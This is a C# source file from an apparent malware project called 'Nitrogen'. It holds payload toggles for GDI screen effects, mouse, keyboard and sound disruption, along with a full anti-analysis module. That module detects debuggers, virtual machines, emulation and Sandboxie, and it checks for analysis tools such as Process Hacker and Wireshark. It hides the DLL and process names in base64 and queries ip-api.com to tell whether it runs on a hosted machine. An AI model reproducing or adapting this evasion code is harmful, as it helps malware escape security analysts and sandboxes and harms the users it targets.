165 lines
6.0 KiB
C#
165 lines
6.0 KiB
C#
using System;
|
|
using System.Diagnostics;
|
|
using System.Linq;
|
|
using System.Management;
|
|
using System.Net;
|
|
using System.Reflection;
|
|
using System.Text;
|
|
using System.Threading;
|
|
using static Nitrogen.Dll_Imports;
|
|
|
|
namespace Nitrogen
|
|
{
|
|
internal class variables
|
|
{
|
|
public static bool gdi_payloads = true;
|
|
public static bool window_shake = false;
|
|
public static bool textchanger = true;
|
|
//public static bool drawcursor = false;
|
|
public static bool mouse = false;
|
|
public static bool keyboard = false;
|
|
public static bool iconmove = false;
|
|
public static bool sounds = true;
|
|
|
|
public static bool extreme = false;
|
|
public static bool AlreadyRunning()
|
|
{
|
|
Process[] processes = Process.GetProcesses();
|
|
Process currentProcess = Process.GetCurrentProcess();
|
|
foreach (Process process in processes)
|
|
{
|
|
try
|
|
{
|
|
if (process.Modules[0].FileName == Assembly.GetExecutingAssembly().Location && currentProcess.Id != process.Id)
|
|
{
|
|
return true;
|
|
}
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
}
|
|
return false;
|
|
}
|
|
private static bool IsDebuggerAttached()
|
|
{
|
|
bool flag = false;
|
|
bool result;
|
|
try
|
|
{
|
|
CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref flag);
|
|
result = flag;
|
|
}
|
|
catch
|
|
{
|
|
result = false;
|
|
}
|
|
return result;
|
|
}
|
|
private static bool IsVirtualMachine()
|
|
{
|
|
using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
|
|
{
|
|
try
|
|
{
|
|
using (ManagementObjectCollection managementObjectCollection = managementObjectSearcher.Get())
|
|
{
|
|
foreach (ManagementBaseObject managementBaseObject in managementObjectCollection)
|
|
{
|
|
if ((managementBaseObject["Manufacturer"].ToString().ToLower() == "microsoft corporation" && managementBaseObject["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) || managementBaseObject["Manufacturer"].ToString().ToLower().Contains("vmware") || managementBaseObject["Model"].ToString() == "VirtualBox")
|
|
{
|
|
return true;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
catch
|
|
{
|
|
return true;
|
|
}
|
|
}
|
|
foreach (ManagementBaseObject managementBaseObject2 in new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_VideoController").Get())
|
|
{
|
|
if (managementBaseObject2.GetPropertyValue("Name").ToString().Contains("VMware") && managementBaseObject2.GetPropertyValue("Name").ToString().Contains("VBox"))
|
|
{
|
|
return true;
|
|
}
|
|
}
|
|
return false;
|
|
}
|
|
private static bool IsEmulated()
|
|
{
|
|
try
|
|
{
|
|
long ticks = DateTime.Now.Ticks;
|
|
Thread.Sleep(10);
|
|
if (DateTime.Now.Ticks - ticks < 10L)
|
|
{
|
|
return true;
|
|
}
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
return false;
|
|
}
|
|
private static bool IsSandBoxie()
|
|
{
|
|
string[] array = new string[]
|
|
{
|
|
Encoding.UTF8.GetString(Convert.FromBase64String("U2JpZURsbC5kbGw=")),
|
|
Encoding.UTF8.GetString(Convert.FromBase64String("U3hJbi5kbGw=")),
|
|
Encoding.UTF8.GetString(Convert.FromBase64String("U2YyLmRsbA==")),
|
|
Encoding.UTF8.GetString(Convert.FromBase64String("c254aGsuZGxs")),
|
|
Encoding.UTF8.GetString(Convert.FromBase64String("Y21kdnJ0MzIuZGxs"))
|
|
};
|
|
for (int i = 0; i < array.Length; i++)
|
|
{
|
|
if (GetModuleHandle(array[i]).ToInt32() != 0)
|
|
{
|
|
return true;
|
|
}
|
|
}
|
|
return false;
|
|
}
|
|
private static bool IsBlacklistedProcessesRunning()
|
|
{
|
|
Process[] processes = Process.GetProcesses();
|
|
string[] source = new string[]
|
|
{
|
|
Encoding.UTF8.GetString(Convert.FromBase64String("cHJvY2Vzc2hhY2tlcg==")),
|
|
Encoding.UTF8.GetString(Convert.FromBase64String("bmV0c3RhdA==")),
|
|
Encoding.UTF8.GetString(Convert.FromBase64String("bmV0bW9u")),
|
|
Encoding.UTF8.GetString(Convert.FromBase64String("dGNwdmlldw==")),
|
|
Encoding.UTF8.GetString(Convert.FromBase64String("d2lyZXNoYXJr")),
|
|
Encoding.UTF8.GetString(Convert.FromBase64String("ZmlsZW1vbg==")),
|
|
Encoding.UTF8.GetString(Convert.FromBase64String("cmVnbW9u")),
|
|
Encoding.UTF8.GetString(Convert.FromBase64String("Y2Fpbg=="))
|
|
};
|
|
foreach (Process process in processes)
|
|
{
|
|
if (source.Contains(process.ProcessName.ToLower()))
|
|
{
|
|
return true;
|
|
}
|
|
}
|
|
return false;
|
|
}
|
|
private static bool IsHosted()
|
|
{
|
|
try
|
|
{
|
|
return new WebClient().DownloadString(Encoding.UTF8.GetString(Convert.FromBase64String("aHR0cDovL2lwLWFwaS5jb20vbGluZS8/ZmllbGRzPWhvc3Rpbmc="))).Contains("true");
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
return false;
|
|
}
|
|
public static bool IsAnalyzed()
|
|
{
|
|
return IsHosted() || IsSandBoxie() || IsVirtualMachine() ||IsDebuggerAttached() || IsEmulated() || IsBlacklistedProcessesRunning();
|
|
}
|
|
}
|
|
}
|